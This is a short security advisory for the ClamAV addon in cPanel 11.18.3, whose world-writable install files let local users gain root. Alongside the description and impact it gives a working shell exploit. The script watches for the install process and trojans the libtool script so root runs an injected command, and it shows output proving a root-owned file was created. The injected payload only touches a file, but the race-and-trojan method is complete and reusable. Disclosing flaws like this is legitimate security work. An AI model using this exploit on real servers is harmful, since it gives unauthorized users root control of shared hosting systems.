cPanel 11.18.3-CURRENT_23661 - ClamAV addon insecure permissions



DESCRIPTION


The ClamAV tarball from clamav.net contained numerous world writable files and directories. As such, when the ClamAV addon was installed by root via WHM, numerous files and directories in the following location could be written to by any local user on the box: /usr/local/cpanel/modules-install/clamavconnector-Linux-i686.

When ClamAV is installed or uninstalled, some files in that directory are executed, such as the libtool utility. This allowed any local user to escalate to root privileges during the install or uninstall of the ClamAV addon by trojaning one of the executed applications.



IMPACT


Any local user could obtain root access by trojaning some files in the clamavconnector directory and waiting for it to be uninstalled by root. This could also be done on the install, but would require foreknowledge of when ClamAV was going to be installed.


#!/bin/sh

# This is just an example of getting root while the ClamAV addon
# module in cPanel is being installed. It is also possible, however,
# to obtain root when the module is being uninstalled, which makes
# this attack a little more feasible ;-)

while true ; do
    sleep 1 ;

    ZLIBCHECK=`ps ax | grep disable-zlib-vchec[k]` ;

    if [ "$ZLIBCHECK" ] ; then
        if [ -f '/usr/local/cpanel/modules-install/clamavconnector-Linux-i686/clamav-0.93/libtool' ] ; then
            cd /usr/local/cpanel/modules-install/clamavconnector-Linux-i686/clamav-0.93
            printf "#!/bin/sh\n/bin/touch /tmp/heh\n" > libtool.
            cat libtool >> libtool.
            mv libtool libtool.old
            mv libtool. libtool
            chmod 755 libtool
            exit
        fi
    fi
done


[user@host ~]$ ls -l /tmp/heh
-rw-r--r-- 1 root root 0 Oct  2 14:00 /tmp/heh